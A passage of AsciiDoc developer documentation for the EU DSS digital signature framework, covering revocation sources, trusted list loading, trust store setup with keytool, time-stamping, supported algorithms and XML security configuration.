(`OnlineRevocationSource`);\n * Sources with the cache mechanism;\n * List of sources (`ListRevocationSource`) with a collection of several sources.\n \n=== Repository Revocation Source\n\nThe above-mentioned class allows caching of CRL and OCSP responses to a user-chosen source. By default DSS provides a JDBC based implementation for this class, but other implementations also can be created. The class contains a complete set of functions to save revocation data to a database, extract, update and remove it. +\nFurthermore, the `RepositoryRevocationSource` allows the implementer to define a backup revocation source, for the case if the database does not contains the certificate's revocation data yet. +\n\nList of cached Revocation sources implemented in DSS:\n\n * `JdbcRevocationSource`\n ** `JdbcCacheCRLSource`\n ** `JdbcCacheOCSPSource`\n\nThe classes allow the following configuration :\n\n[source,java,indent=0]\n.JdbcCacheCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-cached]\n----\n\nAnd an example for JdbcCacheOCSPSource :\n\n[source,java,indent=0]\n.JdbcCacheOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-cached]\n----\n\nBe aware that you have to initialize a table before start of working with the cached revocation repository.\n\n=== Other implementations of CRL and OCSP Sources\n\nSuch sources find the status of a certificate either from a list stored locally or using the information contained in the advanced signature or online way. Here is the list of sources already implemented in the DSS framework:\n\n * CRL sources\n ** `OfflineCRLSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and CRL contents are injected by its sub-classes : \n *** `CMSCRLSource` : Extracts CRLs and CRL references from a CMS Signed Data :\n **** `CAdESCRLSource` : Sub-class of `CMSCRLSource` for a CAdES Signature;\n **** `TimestampCRLSource`: Sub-class of `CMSCRLSource` for a Timestamp token (RFC 3161);\n *** `PAdESCRLSource` : Extracts CRLs and CRL references from a PAdES signature.\n *** `XAdESCRLSource` : Extracts CRLs and CRL references from a XAdES signature.\n *** `ExternalResourcesCRLSource` : A class that can instantiate a list of certificate revocation lists from a directory where should be the individual lists.\n ** `OnlineCRLSource` : Retrieves CRL files from online sources with the CRL Distribution Points information from the certificate.\n ** `JdbcCacheCrlSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storage of valid CRL entries to a defined `DataSource'` and retrieve them locally.\n\n * OCSP sources\n ** `OfflineOCSPSource` : This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and OCSP responses are injected by its sub-classes : \n *** `CMSOCSPSource` : Extracts OCSP responses and OCSP references from a CMS Signed Data :\n **** `CAdESOCSPSource` : Sub-class of `CMSOCSPSource` for a CAdES Signature;\n **** `TimestampOCSPSource`: Sub-class of `CMSOCSPSource` for a Timestamp token (RFC 3161);\n *** `PAdESOCSPSource` : Extracts OCSP responses and OCSP references from a PAdES signature.\n *** `XAdESOCSPSource` : Extracts OCSP responses and OCSP references from a XAdES signature.\n **** `ExternalResourcesOCSPSource` : A class that can instantiate a list of OCSPToken from a directory where should be the individual DER Encoded X509 certificates files.\n ** `OnlineOCSPSource` : Retrieves OCSP responses from online source.\n ** `JdbcCacheOcspSource` : Implementation of the `JdbcRevocationSource`. This implementation allows storage of valid OCSP entries to a defined `DataSource` and retrieve them locally.\n\n==== Online CRL Source\n\nThis is a representation of an Online CRL repository. This implementation will contact using HTTP protocol the CRL Responder to download the CRLs from the given URI. Note that certificate\"s Authority Information Access (AIA) extension is used to find issuer's resources location like CRL file and\/or Online Certificate Status Protocol (OCSP). The URIs of CRL server will be extracted from this property (OID value: 1.3.6.1.5.5.7.48.1.3).\n\nIt allows the following configuration :\n\n[source,java,indent=0]\n.OnlineCRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo-online]\n----\n\n==== Online OCSP Source\n\nThis is a representation of an Online OCSP repository. This implementation will contact using HTTP protocol the OCSP Responder to retrieve the OCSP response. Note that certificate's Authority Information Access (AIA) extension is used to find issuer's resources location like CRT file and\/or Online Certificate Status Protocol (OCSP). The URIs of OCSP server will be extracted from this property (OID value: 1.3.6.1.5.5.7.48.1).\n\nIt allows the following configuration :\n\n[source,java,indent=0]\n.OnlineOCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo-online]\n----\n\n[[certificateVerifier]]\n== CertificateVerifier configuration\n\nThe CertificateVerifier and its implementation CommonCertificateVerifier determines how DSS accesses the external resources and how it should react in some occasions. This configuration is used in both extension and validation mode.\n\n[source,java,indent=0]\n.CertificateVerifier usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CertificateVerifierSnippet.java[tags=demo]\n----\n\n== Trust Anchor(s) configuration\n\nTrust anchors represent an important part in the signature creation \/ validation. That defines which are the trusted entities, which signatures can be trusted,... Do I trust certificates\/signatures from another company \/ country \/ ... ?\n\nSince the version 5.6, DSS allows to configure one or more trusted certificate source(s). These sources can be configured from a TrustStore (kind of keystore which only contains certificates), a trusted list and\/or a list of trusted lists.\n\n[source,java,indent=0]\n.Multiple trusted certificate sources usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=multi-trusted-certificate-sources]\n----\n\n=== Trust store initialization\n\nIf you have a collection of certificates to trust, the easier way to provide them to DSS it to use a KeyStore \/ TrustStore. \n\n[source,java,indent=0]\n.Trust anchor initialization from a Trust Store\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trust-store]\n----\n\nTo generate the trust store, there's an utility class CreateKeyStoreApp in the dss-cookbook module.\n\n=== Trusted List Certificate Source \n\nIn several countries, a list of Trust Service Providers (TSP) is published. This list is usually published in a machine processable format (XML) and sometimes in a human-readable format (PDF). A standard (ETSI TS 119 612) exists with the specifications for the XML format. \n\nDSS contains all needed resources to download, parse, validate and interpret the trusted list contents. Since DSS 5.6, that's possible to configure one or more independent trusted list(s) (aka not linked to a list of trusted lists) and\/or one or more list of trusted lists.\n\nIf you want to collect your trusted certificates from trusted list(s), the TrustedListsCertificateSource is required. The trusted list(s) loading can require some times (connection time-out, xml parsing, xml validation,...). This process is usually executed in background. An instance of TrustedListsCertificateSource needs to be created. That will be synchronized with the TLValidationJob.\n\n[source,java,indent=0]\n.Trusted List Certificate Source \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=trusted-list-source]\n----\n\n[[tlValidationJob]]\n== TLValidationJob\n\nThe TLValidationJob allows to download, parse, validate the Trusted List(s) and Lists Of Trusted Lists (LOTL). Once the task is done, its result is stored in the TrustedListsCertificateSource. The job uses 3 different caches (download, parsing and validation) and a state-machine to be efficient. \n\nTrusted lists are stored on the file system. That offers the possibility to run in offline mode with the stored trusted lists. Trusted Lists can be loaded from the file system and\/or from Internet.\n \nIn the next sections the different configurations will be covered.\n\n=== TLSource and LOTLSource\n\nSeveral TLSources and several LOTLSources can be injected in a TLValidationJob. The only constraint is the uniqueness of the Trusted List URLs.\n\n[source,java,indent=0]\n.Multiple TLSources and multiple LOTLSources configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-config-sources]\n----\n\n==== Trusted List Source (TLSource)\n\nA TLSource allows to quickly setup a trusted list configuration. The URL and the signing certificates for this TL are mandatory. Optionally, predicates \/ filters can be configured to retrieve only a part of the trust service providers or trust services.\t\n\n[source,java,indent=0]\n.TLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=french-tl-source]\n----\n\n==== List Of Trusted Lists Source (LOTLSource)\n\nA similar configuration is possible for Lists Of Trusted Lists (LOTL). That requires an URL and the possible LOTL signers. Some other parameters are possible. By default, all listed trusted lists are loaded.\n\n[source,java,indent=0]\n.LOTLSource configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=european-lotl-source]\n----\n\n=== DSSFileLoader\n\nThe FileCacheDataLoader is used to download the trusted list contents on the file-system. Two different configurations are needed. Both of them share the same folder : \n\n * offline refresh : disabled download from Internet and unlimited cache expiration \n * online refresh : enabled download from Internet and limited cache expiration\n \n[source,java,indent=0]\n.Offline and Online refresh configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=job-loaders]\n----\n\n=== The SynchronizationStrategy\n\nThe SynchronizationStrategy defines which are the trusted lists or list of trusted lists to be synchronized. By default, DSS synchronizes all of them. DSS don't reject any expired \/ invalid \/... trusted lists. The content is trusted and a warning is added in a signature \/ certificate validation.\n\nThe strategy is configurable via the interface SynchronizationStrategy :\n\n[source,java,indent=0]\n.Example of a custom SynchronizationStrategy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=custom-strategy]\n----\n\nDSS provides two implementations : ExpirationAndSignatureCheckStrategy and AcceptAllStrategy (default).\n\n=== The CacheCleaner\n\nThe CacheCleaner specifies how DSS clear the cache in case of expired URL,... 2 options are available : memory and file-system.\n\n[source,java,indent=0]\n.CacheCleaner Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=cache-cleaner]\n----\n\n=== Alerting from TL Loading\n\nDSS allows running of custom alerts in some situations (eg : invalid TL signature, LOTL location change,...). Alert works with two concepts : detection and alert handler. After the download\/parsing\/validation and before the synchronization, the results are tested to detect events and launch alert(s).\n\n[source,java,indent=0]\n.Examples of Alerting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=alerting]\n----\n\n=== Executor Service\n\nAn Executor Service parameter allows you to customize a way of the program execution on your Java machine, by configuring a number of possible threads to be running, await time and so on. \n\n[source,java,indent=0]\n.Executor Service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=executor-service]\n----\n\n=== Complete configuration for the European LOTL\n\nBelow, you can find a complete configuration for the European List Of Trusted Lists. The URLs need to be externalized.\n\n[source,java,indent=0]\n.European LOTL Configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/EuropeanLOTLSnippets.java[tags=complete-european-lotl-config]\n----\n\n=== The TL \/ LOTL refresh\n\nThe TL \/ LOTL loading in DSS works as below : \n\n * Download \/ parse \/ validate all LOTLSources from the configuration with\/without pivot support (multi-threaded)\n * Analyze introduced changes and expire cache entries (new TL URLs, new signing certificates for a TL,...)\n * Create TLSources from the retrieved LOTLs\n * Combine these TLSources with independent TLSources (from the configuration)\n * Download \/ parse \/ validate all TLs (multi-threaded)\n * If alerts are configured, test if an alert needs to be launched\n * If the debug is enabled, print in the log the cache status\n * Synchronize the TrustedListCertificateSource\n * If the cache cleaner is configured, execute it\n * If the debug is enabled, print in the log the cache status\n\nThe refresh can be called with the offline or the online loader and run exactly the same code\n\n[source,java,indent=0]\n.How to refresh the Trusted List(s) and Lists of Trusted Lists \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=refresh]\n----\n\n[[KeyStore]]\n==== Java Keystore Management\n\nGenerally (like in case of European LOTL) DSS downloads Trusted Lists by using the SSL protocol (for resources using HTTPS extension), that requires to have a certificate of a remote source in the Java trust store. The certificates have their own validity period and can expire. If a certificated is expired, it will be replaced on a server by a new one in order to support a secure SSL connection. The easiest way to know if your Java trust store is outdated and new certificates need to be added is to check your logs during a TLValidationJob update :\n\n[source]\n--\nERROR 14052 --- [pool-2-thread-30] e.e.e.dss.tsl.runnable.AbstractAnalysis : Unable to process GET call for url [https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml]. Reason : [PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target]\n--\n\nThe `SunCertPathBuilderException` means that the certificate established the secure connection is not trusted by your Java Virtual Machine. In order to add the certificate to the trust store, you need to do the following steps (the example is based on Windows OS and Google Chrome browser):\n\n . Open the failed URL in your browser. In our case it will be 'https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml' obtained from the logs.\n . Click on a lock icon next to the URL in the tab you just opened. It will open a window about the current connection status.\n . Click on 'Certificate' button to open the Certificate window.\n . Go to 'Details' tab and choose 'Copy to File...'.\n . Process the 'Certificate Export Wizard', by saving the certificate in one of '.CER' formats. Store the file in your file system. For us it will create a file 'ee.cer'.\n . Run 'Command Prompt' with administrator permissions (right click -> 'Run As Administrator').\n . Execute the following line (ensure that 'keytool' is installed) :\n\n.Certificate import\n[source,ruby]\n----\nkeytool -import -alias newCert -file pathToCert\\ee.cer -keystore pathToJavaDirectory\\lib\\security\\cacerts -storepass changeit\n----\n\nThe default password for a Java keystore is \"changeit\". Ensure that you have a default configuration, or use another password you have configured.\n\nNOTE: In order to apply changes, the application using Java must be rebooted.\n\nAfter these steps the `TLValidationJob` will successfully download the target Trusted List (i.e. Estonian in our example).\n\nNOTE: This described algorithm is not only one available solution, if you have difficulties with this, you can search in the Internet for another working for you solution.\n\n=== TLValidationJobSummary\n\nThe class TLValidationJobSummary contains all processed data about the download (time, error,...), the parsing (extracted information, parsing error,...) and the signature validation (signing certificate, signing time,...).\n\n[source,java,indent=0]\n.How to retrieve the information about the TLValidationJob process \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=tl-summary]\n----\n\n== TSP Sources\n\nThe Time Stamp Authority by creating time-stamp tokens provides independent and irrefutable proof of time for business transactions, e-documents and digital signatures. The TSA must comply with the IETF RFC 3161 specifications (cf. <<R08>>). A time-stamp is obtained by sending the digest value of the given data and digest algorithm to the Time Stamp Authority. The returned time-stamp is a signed data that contains the digest value, the identity of the TSA, and the time of stamping. This proves that the given data existed before the time of stamping.\nThe DSS framework proposes TSPSource interface to implement the communication with TSA. The class OnlineTSPSource is the default implementation of TSP using HTTP(S) communication layer.\nThe following bit of Java code illustrates how you might use this class:\n\n[source,java,indent=0]\n.OnlineTSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/OnlineTSPSourceTest.java[tags=demo]\n----\n\n=== Time-stamp policy\n\nA time-stamp policy is a \"named set of rules that indicates the applicability of a time-stamp token to a particular community and\/or class of application with common security requirements\". A TSA may define its own policy which enhances the policy defined in RFC 3628. Such a policy shall incorporate or further constrain the requirements identified in RFC 3628. A time-stamp policy may be defined by the user of times-stamp services.\n\n=== Composite TSP Source\n\nSometimes, timestamping servers may encounter interruptions (restart,...). To avoid failing signature extension, DSS allows a user to configure several TSP Sources. DSS will try source by source until getting an usable timestamp token. \n\n[source,java,indent=0]\n.Configuration of a CompositeTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/CompositeTSPSourceTest.java[tags=demo]\n----\n\n== Supported algorithms\n\nDSS supports several signature algorithms (combination of an encryption algorithm and a digest algorithm). Below, you can find the supported combinations. The support of the algorithms depends on the registered OID (ASN1) or URI (XML).\n\nIn the next table, XAdES also applies to ASiC with embedded XAdES signatures and CAdES also concerns PAdES and ASiC with embedded CAdES signatures. \n\nNOTE: SmartCards\/HSMs don't allow signing with all digest algorithms. Please refer to your SmartCard\/HSM provider.\n\n[cols=\"13*^\"]\n.Supported algorithms\n|===\n| | SHA-1 | SHA-224 | SHA-256 | SHA-384 | SHA-512 | SHA3-224 | SHA3-256 | SHA3-384 | SHA3-512 | MD2 | MD5 | RIPEMD160\n\n13+|*RSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*RSA-PSS*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*ECDSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"]\n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*Ed25519*\n\n| XAdES | | | | | | | | | | | | \n\n| CAdES | | | | | icon:check-circle[role=\"lime\"] | | | | | | | \n\n13+|*DSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | | icon:check-circle[role=\"lime\"] | | | | | | | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | | | | | | | | | |\n\n13+|*HMAC*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n|===\n\n== Implementation management with ServiceLoader\n\nDSS incorporates modules that are loaded in the run time based on the chosen configuration and the input data via a https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader]. This provides a flexibility for an end-user to work only with selected modules and a possibility to expand DSS with custom implementations.\n\nIn order to provide a chosen implementation(s) to ServiceLoader, a file listing all the desired implementations should be created in the resource directory `META-INF\/services` with a name matching the implemented interface. When merging sources (e.g. creating a Fat JAR module), the files can be lost\/overwritten, and should be configured manually (all the required implementations shall be listed).\n\nNOTE: If a DSS module(s) implementing a required interface(s) is added to your project's dependency list, the implementation shall be loaded automatically.\n\nThe following modules are provided with independent implementations:\n\n * <<dssUtils>>;\n * <<dssCrlParser>>;\n * <<dssPades>>.\n \nAdditionally, DSS is able to choose the required implementation for the following interfaces:\n \n * `DocumentValidationFactory` - checks a provided signed file's format and loads a relevant validator;\n * `SignaturePolicyValidator` - checks a signature policy file and loads a relevant validator to be able to process the detected format.\n\nWARNING: If no appropriate available implementation is found, an exception will be thrown.\n\n=== Document Validation Factory\n\nThis factory is used to create a required instance of a `DocumentValidator` based on the provided file's format (signature or timestamp). An implementation shall process a file format check and load the related <<signedDocumentValidator>> implementation to be used for the file's validation.\n\nThe following implementations are present in DSS:\n\n * CMSDocumentValidatorFactory : loads CMSDocumentValidator, used for a CAdES validation (delivered in dss-cades module);\n * XMLDocumentValidatorFactory : loads XMLDocumentValidator, used for a XAdES validation (delivered in dss-xades module);\n * PDFDocumentValidatorFactory : loads PDFDocumentValidator, used for a PAdES validation (delivered in dss-pades module);\n * JAdESDocumentValidatorFactory : loads JWSCompactDocumentValidator or JWSSerializationDocumentValidator, depending on provided JSON signature type (delivered in dss-jades module);\n * ASiCContainerWithCAdESValidatorFactory : loads ASiCContainerWithCAdESValidator (delivered in dss-asic-cades module);\n * ASiCContainerWithXAdESValidatorFactory : loads ASiCContainerWithXAdESValidator (delivered in dss-asic-xades module);\n * DetachedTimestampValidatorFactory : loads DetachedTimestampValidator, for an indepenedent timestamp validation (delivered in dss-document module).\n\n=== Signature Policy Validator\n\nThis interface is used to validate a signature policy reference extracted from a signature. The following implementations are provided:\n\n * BasicASNSignaturePolicyValidator : validates policy files, which are based on ETSI TR 102 272;\n * XMLSignaturePolicyValidator : validates XML signature policies supporting transformations;\n * NonASN1SignaturePolicyValidator : validates a policy by digest computed on an original file's content;\n * ZeroHashSignaturePolicyValidator : validates a policy if \"zero hash\" value is defined in a signature (see <<R02>>);\n * EmptySignaturePolicyValidator : is proceeded if a policy file is not found or not accessible.\n\n== Multi-threading\n\nDSS can be used in multi-threaded environments but some points need to be considered like resources sharing and caching. All operations are stateless and this fact requires to be maintained. Some resources can be shared, others are proper to an operation. \n\nFor each provided operation, DSS requires a CertificateVerifier object. This object is responsible to provide certificates and accesses to external resources (AIA, CRL, OCSP,...). At the beginning of all operation, CertificateSources and RevocationSources are created for each signature \/ timestamp \/ revocation data. Extracted information are combined with the configured sources in the CertificateVerifier. For these reasons, integrators need to be careful about the CertificateVerifier configuration.\n\n=== Resource sharing\n\nThe trusted certificates can be shared between multiple threads because these certificates are static. This means they don't require more analysis. Their status won't evolve. For these certificates, DSS doesn't need to collect issuer certificate and\/or their revocation data. \n\nIn opposition, the adjunct certificates cannot be shared. These certificates concern a specific signature\/validation operation. This parameter is used to provide missing certificate(s). When DSS is unable to build the complete certificate path with the provided certificates (as signature parameters or embedded within a signature), it is possible to inject not present certificates. These certificates are not necessarily trusted and may require future \"modifications\" like revocation data collection,... \n\n=== Caching\n\nIn case of multi-threading usage, we strongly recommend caching of external resources. All external resources can be cached (AIA, CRL, OCSP) to improve performances and to avoid requesting too much time the same resources. FileCacheDataLoader and JdbcCacheCRLSource can help you in this way. \n\n[[xmlSecurities]]\n== XML Securities\n\nSince DSS 5.7, the framework allows custom configuration of XML-related modules for enabling\/disabling of XML securities (e.g. in order to use Xalan or Xerces).\n\nWARNING: We strongly do not recommend disabling of security features and usage of deprecated dependencies. Be aware: the feature is designed only for experienced users, and all changes made in the module are at your own risk.\n\nThe configuration is available for the following classes:\n\n * `javax.xml.parsers.DocumentBuilderFactory` with a `DocumentBuilderFactoryBuilder` - builds a DOM document object from the obtained XML file and creates a new Document;\n * `javax.xml.transform.TransformerFactory` with a `TransformerFactoryBuilder` - loads XML templates and builds DOM objects;\n * `javax.xml.validation.SchemaFactory` with a `SchemaFactoryBuilder` - loads XML Schema;\n * `javax.xml.validation.Validator` with a `ValidatorConfigurator` - configures a validator to validate an XML document against an XML Schema. \n \nAll the classes can be configured with the following methods (example for `TransformerFactory`):\n\n[source,java,indent=0]\n.XMLSecurities configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=demo]\n----\n\nThe `javax.xml.parsers.DocumentBuilderFactory`, that allows XML files parsing and creation of DOM `Document` object, can be configured with the following methods:\n\nNOTE: Since DSS 5.9 the configuration of `javax.xml.parsers.DocumentBuilderFactory` has been moved from `DomUtils` to a new singleton class `DocumentBuilderFactoryBuilder`.\n\n[source,java,indent=0]\n.DocumentBuilderFactory configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=dbf]\n----\n\nThe class `XmlDefinerUtils` is a singleton, therefore all changes performed on the instance will have an impact to all calls of the related methods.\n\n== JAXB modules\n\nSince the version 5.5, DSS provides the following JAXB modules with a harmonized structure : \n\n * `dss-policy-jaxb` - defines validation policy JAXB model\n * `dss-diagnostic-jaxb` - defines Diagnostic Data JAXB model\n * `dss-detailed-report-jaxb` - defines Detailed Report JAXB model\n * `dss-simple-report-jaxb` - defines Simple Report JAXB model\n * `dss-simple-certificate-report-jaxb` - defines Certificate Simple Report JAXB model\n \nAll modules share the same logic and have the following structure (where *** is a model name):\n\n`*_dss-***-jaxb_*`::\n\t`*_src\/main\/java_*`:::\n\t\t`*_eu.europa.esig.dss.***_*`::::\n\t\t\t** `*_***.java_*` - wrapper(s) which eases the JAXB manipulation\n\t\t\t** `*_..._*`\n\t\t\t** `*_***Facade.java_*` - class which allows marshalling\/unmarshalling of jaxb objects, generation of HTML\/PDF content, etc.\n\t\t\t** `*_***XmlDefiner.java_*` - class which contains the model definition (XSD, XSLT references, ObjectFactory)\n\t\t\t** `*_jaxb_*` - generated on compile time\n\t\t\t \t*** `*_Xml***.java_*` - JAXB model\n\t\t\t\t*** `*_..._*`\n\t`*_src\/main\/resources_*`:::\n\t\t`*_xsd_*`::::\n\t\t\t** `*_***.xsd_*` - XML Schema (XSD) for the Detailed Report model\n\t\t\t** `*_binding.xml_*` - XJC instructions to generate the JAXB model from the XSD\n\t\t`*_xslt_*`::::\n\t\t\t** `*_html_*`\n\t\t\t*** \t`*_***.xslt_*` - XML Stylesheet for the HTML generation\n\t\t\t** `*_pdf_*`\n\t\t\t***\t`*_***.xslt_*` - XML Stylesheet for the PDF generation\n\nIn the main classes, a `Facade` is present to quickly operate with the JAXB objects (eg: marshall, unmarshall, generate the HTML\/PDF, validate the XML structure,...).\t\n\n[source,java,indent=0]\n.DetailedReportFacade usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-facade]\n----\n\nA `XmlDefiner` is also available with the access to the embedded XML Schemas (XSD), the XML Stylesheets (XSLT) to be able to generate the HTML or the PDF content (for DSS specific JAXB) and the JAXB Object Factory.\n\n[source,java,indent=0]\n.DetailedReportXmlDefiner usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-xml-definer]\n----\n\n=== Report stylesheets\n\nThe report modules (namely: `dss-simple-report-jaxb`, `dss-simple-certificate-report-jaxb` and `dss-detailed-report-jaxb`) contain two XSLT style sheets each for final reports generation:\n\n * Bootstrap 4 XSLT for HTML report;\n * PDF XSLT for PDF report.\n\nNOTE: Since DSS 5.9 only Bootstrap 4 XSLT is provided within the framework for HTML report generation.\n \nIn order to generate a report with a selected style sheet you need to call a relevant method in a Facade class (see classes definition above):\n\n[source,java,indent=0]\n.HTML report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=demo]\n----\n\nOtherwise, in case if you need to customize the transformer, you can create a report by using an XmlDefiner:\n\n[source,java,indent=0]\n.Custom report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=custom]\n----\n\n== Alerts\n\nSince DSS 5.7 the framework includes an extended possibility to execute custom processes in case of arbitrary defined events.\n\nThe `Alert` is a basic interface used to trigger a process on a passed object.\nDSS provides an `AbstractAlert` implementation of the interface with a clearly defined structure. The class must be instantiated with two attributes:\n\n * `AlertDetector` - used to detect an event\/state of the object and trigger a process;\n * `AlertHandler` - defines a process to be executed on an object.\n\nIn its basic module, framework provides a few alerts based on a `Status`:\n\n * `ExceptionOnStatusAlert` - throws an `AlertException` (RuntimeException) when the status reports an issue;\n * `LogOnStatusAlert` - logs a message with the defined log level;\n * `SilentOnStatusAlert` - ignores the reported issue and does nothing.\n\nThe usage of alerts is available in the following classes:\n\n * <<xmlSecurities>> configurators from `dss-jaxb-parsers` module : `TransformerFactoryBuilder`, `SchemaFactoryBuilder`, `ValidatorConfigurator`;\n * <<certificateVerifier>> - to handle the unexpected situation(s) in a custom way (introduced `AlertException` to re-throw exceptions);\n * <<tlValidationJob>> - to process custom actions on change\/state on loading of LOTL\/TLs (see `LOTLAlert` and `TLAlert`).\n\n== I18N (Internationalization)\n\nSince DSS 5.6 a new module has been introduced allowing changing of 